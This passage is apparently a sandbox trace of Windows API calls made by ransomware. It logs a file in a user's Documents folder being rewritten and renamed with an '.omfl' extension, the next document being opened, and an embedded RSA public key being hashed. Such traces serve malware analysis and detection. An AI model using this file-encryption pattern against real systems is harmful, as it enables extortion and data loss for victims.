lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0131.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16848 [0131.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0131.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8e0 [0131.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0131.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0131.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0131.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0131.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f38 | out: hHeap=0x4970000) returned 1 [0131.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f38 [0131.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0131.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0131.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0131.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0131.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0131.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0131.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0131.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0131.137] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0131.137] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f38 | out: hHeap=0x4970000) returned 1 [0131.138] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0131.138] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24890 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f68 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f50 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f20 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0131.138] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0131.139] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f08 | out: hHeap=0x4970000) returned 1 [0131.139] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd34938 | out: hHeap=0x4970000) returned 1 [0131.139] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0131.139] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0131.139] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757ca08 | out: hHeap=0x4970000) returned 1 [0131.139] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0131.139] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0131.139] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.139] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0131.139] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0131.139] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0131.139] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.139] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.139] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd35410*, nNumberOfBytesToWrite=0xdc26, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd35410*, lpNumberOfBytesWritten=0xe00fb14*=0xdc26, lpOverlapped=0x0) returned 1 [0131.139] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd35410 | out: hHeap=0x4970000) returned 1 [0131.140] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xdc2b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.140] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0131.140] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0131.140] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0131.140] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0131.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0131.140] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0131.140] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0131.140] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0131.140] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0131.140] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0131.140] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0131.140] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0131.140] CloseHandle (hObject=0x5c8) returned 1 [0131.142] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2e60 [0131.142] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x870) returned 0xdd29950 [0131.142] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2e60 | out: hHeap=0x4970000) returned 1 [0131.142] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xBFE.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xbfe.odp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xBFE.odp.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xbfe.odp.omfl")) returned 1 [0131.143] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0131.143] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.143] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.145] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0131.145] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79ec6620, ftCreationTime.dwHighDateTime=0x1d5e475, ftLastAccessTime.dwLowDateTime=0x34c9be0, ftLastAccessTime.dwHighDateTime=0x1d5db95, ftLastWriteTime.dwLowDateTime=0x34c9be0, ftLastWriteTime.dwHighDateTime=0x1d5db95, nFileSizeHigh=0x0, nFileSizeLow=0xa201, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ysie.doc", cAlternateFileName="")) returned 1 [0131.145] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0131.145] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8e) returned 0xdd14728 [0131.145] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0131.145] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ysie.doc") returned=".doc" [0131.145] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\ysie.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ysie.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0131.145] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=41473) returned 1 [0131.145] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0131.148] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0xa1db, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0131.148] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0131.149] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.149] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.150] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.150] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xa201, lpOverlapped=0x0) returned 1 [0131.150] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.150] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0131.150] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.150] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0131.150] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0131.151] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0131.151] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0131.151] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0131.151] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0131.151] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0131.151] GetLastError () returned 0x0 [0131.152] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0131.152] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0131.152] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0131.152] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0131.152] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0131.152] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.152] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0131.152] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0131.152] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0131.152] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xa200) returned 0xdd35410 [0131.152] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0131.152] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0131.152] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0131.152] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34938 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f08 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdd34980 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f20 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f50 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f68 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0131.153] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0131.153] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f50 | out: hHeap=0x4970000) returned 1 [0131.153] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f68 | out: hHeap=0x4970000) returned 1 [0131.153] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.153] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0131.153] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16f68 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16f50 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08ea8 [0131.153] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0131.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0131.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0131.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0131.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f68 | out: hHeap=0x4970000) returned 1 [0131.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0131.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16f50 | out: hHeap=0x4970000) returned 1 [0131.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0131.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0131.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0131.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08cc8 | out: hHeap=0x4970000) returned 1 [0131.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0131.154] GetCurrentThreadId () returned 0x618 [0131.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0131.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0xdd2cd60 [0131.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0131.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0131.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0131.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0131.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24578 [0131.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.154] GetCurrentThreadId () returned 0x618 [0131.154] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.155] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.155] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0131.155] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0131.155] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0131.155] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4c) returned 0x757ca08 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24890 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0131.155] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa890 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8b0 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8c0 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa860 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8e0 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8a0 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16f50 [0131.155] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa890 [0131.155] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e98 [0131.155] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8d0 [0131.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0xdcfa8f0 [0131.156] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 